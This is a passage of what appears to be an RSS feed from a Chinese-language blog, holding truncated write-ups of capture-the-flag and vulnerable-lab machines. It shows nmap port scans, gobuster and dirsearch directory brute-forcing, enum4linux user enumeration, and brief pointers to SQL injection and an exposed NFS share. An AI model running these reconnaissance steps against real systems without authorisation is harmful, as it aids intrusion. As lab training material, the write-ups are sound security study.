      <pubDate>Mon, 17 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnyx-loweb/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Low&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Loweb  
❯ nmap 192.168.56.122 -sV -A  -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Loweb  
❯ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt             
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.122
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/library              (Status: 301) [Size: 318] [--&amp;gt; http://192.168.56.122/library/]
/server-status        (Status: 403) [Size: 279]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

[root@kali] /home/kali/Loweb  
❯ gobuster dir -u http://192.168.56.122/library -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.122/library
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1068]
/login                (Status: 301) [Size: 324] [--&amp;gt; http://192.168.56.122/library/login/]
/admin                (Status: 301) [Size: 324] [--&amp;gt; http://192.168.56.122/library/admin/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;sql-injection&#34;&gt;SQL Injection&lt;/h2&gt;
&lt;p&gt;进入登录页面，用户名处存在&lt;strong&gt;SQL注入&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Zerotrace</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnyx-zerotrace/</link>
      <pubDate>Sun, 16 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnyx-zerotrace/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.119 -sV -A              

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Massively by HTML5 UP
8000/tcp open  ftp     pyftpdlib 1.5.7
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.119:8000
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Zerotrace  
❯ dirsearch -u http://192.168.56.119 -t 50    
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                         
                                                                                                                                                                                                                
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

Output File: /home/kali/Zerotrace/reports/http_192.168.56.119/_25-03-15_19-12-30.txt

Target: http://192.168.56.119/

[19:12:30] Starting:                                                                                                                                                                                            
[19:12:30] 301 - 169B  - /.admin  -&amp;gt;  http://192.168.56.119/.admin/        
[19:12:30] 403 - 555B  - /.admin/
[19:12:31] 403 - 555B  - /.ht_wsr.txt                                      
[19:12:31] 403 - 555B  - /.htaccess.bak1                                   
[19:12:31] 403 - 555B  - /.htaccess.orig                                   
[19:12:31] 403 - 555B  - /.htaccess.sample
[19:12:31] 403 - 555B  - /.htaccess.save
[19:12:31] 403 - 555B  - /.htaccess_extra                                  
[19:12:31] 403 - 555B  - /.htaccess_orig
[19:12:31] 403 - 555B  - /.htaccess_sc
[19:12:31] 403 - 555B  - /.htaccessOLD
[19:12:31] 403 - 555B  - /.htaccessBAK
[19:12:31] 403 - 555B  - /.htaccessOLD2                                    
[19:12:31] 403 - 555B  - /.htm
[19:12:31] 403 - 555B  - /.html                                            
[19:12:31] 403 - 555B  - /.httr-oauth                                      
[19:12:31] 403 - 555B  - /.htpasswds                                       
[19:12:31] 403 - 555B  - /.htpasswd_test                                   
[19:12:37] 301 - 169B  - /assets  -&amp;gt;  http://192.168.56.119/assets/        
[19:12:37] 403 - 555B  - /assets/                                          
[19:12:43] 403 - 555B  - /images/                                          
[19:12:43] 301 - 169B  - /images  -&amp;gt;  http://192.168.56.119/images/
[19:12:44] 200 - 17KB - /LICENSE.txt                                      
[19:12:50] 200 - 930B  - /README.txt                                       
[19:12:54] 403 - 555B  - /uploads/                                         
[19:12:54] 403 - 555B  - /uploads/affwp-debug.log                          
[19:12:54] 403 - 555B  - /uploads/dump.sql                                 
                                                                             
Task Completed                                                                                                                                                                                                  
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;发现存在一个**/.admin**目录&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Lower4</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnyx-lower4/</link>
      <pubDate>Sat, 15 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnyx-lower4/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Low&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Lower4  
❯ nmap 192.168.56.120 -sV -A                                                

PORT    STATE SERVICE VERSION                                                                                                                                                              
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
|_auth-owners: root
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident?
|_auth-owners: lucifer
MAC Address: 08:00:27:DE:A3:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;从&lt;strong&gt;113&lt;/strong&gt;端口上扫描到一个用户名：&lt;strong&gt;lucifer&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Entropy</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnvm-entropy/</link>
      <pubDate>Thu, 13 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnvm-entropy/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Entropy  
❯ nmap 192.168.56.117 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 cc:05:ab:8c:ea:28:eb:b1:9d:da:8c:ce:65:ee:63:43 (ECDSA)
|_  256 3f:9f:0a:7d:61:f8:6f:4b:46:01:c4:db:74:b2:b6:a7 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Apache2 Debian Default Page: It works
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;目录扫描没有任何结果，在&lt;strong&gt;apache&lt;/strong&gt;默认页中发现路径&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-SingDanceRap</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-singdancerap/</link>
      <pubDate>Wed, 12 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-singdancerap/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.116 -sV -A -p-

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5d:41:2a:c1:2d:3b:6c:78:b3:af:ae:9d:42:fe:88:b8 (RSA)
|   256 3c:e9:64:eb:84:fe:5c:83:94:07:27:6c:12:14:c8:4c (ECDSA)
|_  256 09:9b:2b:18:de:6c:6d:f8:8b:15:df:6c:0f:c0:7c:b2 (ED25519)
80/tcp    open     http    Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: News Website
65000/tcp filtered unknown
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ gobuster dir -u http://192.168.56.116/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50  -x php,html,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.116/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 3118]
/news.php             (Status: 200) [Size: 1301]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/littlesecrets        (Status: 301) [Size: 324] [--&amp;gt; http://192.168.56.116/littlesecrets/]
/server-status        (Status: 403) [Size: 279]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;针对这个**/littlesecrets**再次进行扫描&lt;/p&gt;</description>
    </item>
    <item>
      <title>picoCTF 2025</title>
      <link>https://www.hyhforever.top/posts/2025/03/picoctf-2025/</link>
      <pubDate>Wed, 12 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/picoctf-2025/</guid>
      <description>&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h3 id=&#34;cookie-monster-secret-recipe&#34;&gt;Cookie Monster Secret Recipe&lt;/h3&gt;
&lt;p&gt;任意登录后发现&lt;strong&gt;Cookie&lt;/strong&gt;字段&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/03/picoctf-2025/images/image-207.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/03/picoctf-2025/images/image-207.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进行&lt;strong&gt;URL解码&lt;/strong&gt;和&lt;strong&gt;Base64解码&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/03/picoctf-2025/images/image-208.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/03/picoctf-2025/images/image-208.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;head-dump&#34;&gt;head-dump&lt;/h3&gt;
&lt;p&gt;在网页源码中发现一个**/api-docs**路由&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/03/picoctf-2025/images/image-209.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/03/picoctf-2025/images/image-209.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进入之后执行一下**/heapdump**的&lt;code&gt;GET&lt;/code&gt;方法，发现响应的是一个下载链接&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Solitude</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnvm-solitude/</link>
      <pubDate>Tue, 11 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnvm-solitude/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Solitude  
❯ nmap 192.168.56.115 -sV -A -p- 

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2b:c7:6c:06:c7:80:41:bc:cb:dc:fe:d6:e8:85:db:b0 (RSA)
|   256 61:d1:67:f9:8f:99:62:9b:d4:9a:70:19:ff:78:bd:77 (ECDSA)
|_  256 2b:6e:53:ab:ac:68:ca:78:a7:d6:2f:34:65:e8:5d:17 (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:22:A4:A8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-11T20:26:05
|_  start_date: N/A
|_nbstat: NetBIOS name: SOLITUDE, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: &amp;lt;unknown&amp;gt; (unknown)
|_clock-skew: 7h59m57s
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;enum4linux&#34;&gt;Enum4linux&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Solitude  
❯ enum4linux -a 192.168.56.115

[+] Enumerating users using SID S-1-22-1 and logon username &amp;#39;&amp;#39;, password &amp;#39;&amp;#39;                                                          
                                                                                                                                     
S-1-22-1-1000 Unix User\garret (Local User)                                                                                          
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;找到一个用户名：&lt;strong&gt;garret&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Change</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnyx-change/</link>
      <pubDate>Tue, 11 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnyx-change/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.114 -sV -A -p- ⏎

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-11 02:36:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:DD:48:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 15h59m57s
|_nbstat: NetBIOS name: CHANGE, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: 08:00:27:dd:48:ca (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-03-11T02:37:41
|_  start_date: N/A
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;megachange.nyx&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Matrioshka</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-matrioshka/</link>
      <pubDate>Mon, 10 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-matrioshka/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Matrioshka  
❯ nmap 192.168.56.108 -sV -A -p- -T4                     

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 b5:a4:7c:65:5c:1f:d7:89:42:bd:76:df:2c:8e:93:4e (ECDSA)
|_  256 5d:3d:2b:43:fc:89:fa:24:a3:f4:73:5f:7b:89:6c:e3 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: mamushka
MAC Address: 08:00:27:D5:7C:4C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;mamushka.hmv&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Lower3</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnyx-lower3/</link>
      <pubDate>Mon, 10 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnyx-lower3/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Low&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Lower3  
❯ nmap 192.168.56.113 -sV -A -p- 

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36141/tcp   mountd
|   100005  1,2,3      46793/udp   mountd
|   100005  1,2,3      56285/tcp6  mountd
|   100005  1,2,3      57285/udp6  mountd
|   100021  1,3,4      37329/tcp6  nlockmgr
|   100021  1,3,4      39713/tcp   nlockmgr
|   100021  1,3,4      41715/udp   nlockmgr
|   100021  1,3,4      58173/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
36141/tcp open  mountd   1-3 (RPC #100005)
38315/tcp open  mountd   1-3 (RPC #100005)
39713/tcp open  nlockmgr 1-4 (RPC #100021)
41871/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:C5:C6:B4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;nfs&#34;&gt;NFS&lt;/h2&gt;
&lt;p&gt;发现了 &lt;strong&gt;NFS（Network File System）&lt;/strong&gt; 共享，可能存在可挂载的远程文件系统。 &lt;code&gt;mountd&lt;/code&gt;、&lt;code&gt;nlockmgr&lt;/code&gt;、&lt;code&gt;nfs_acl&lt;/code&gt; 这些 RPC 端口也被发现，表明服务器可能允许远程文件访问。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Newbee</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-newbee/</link>
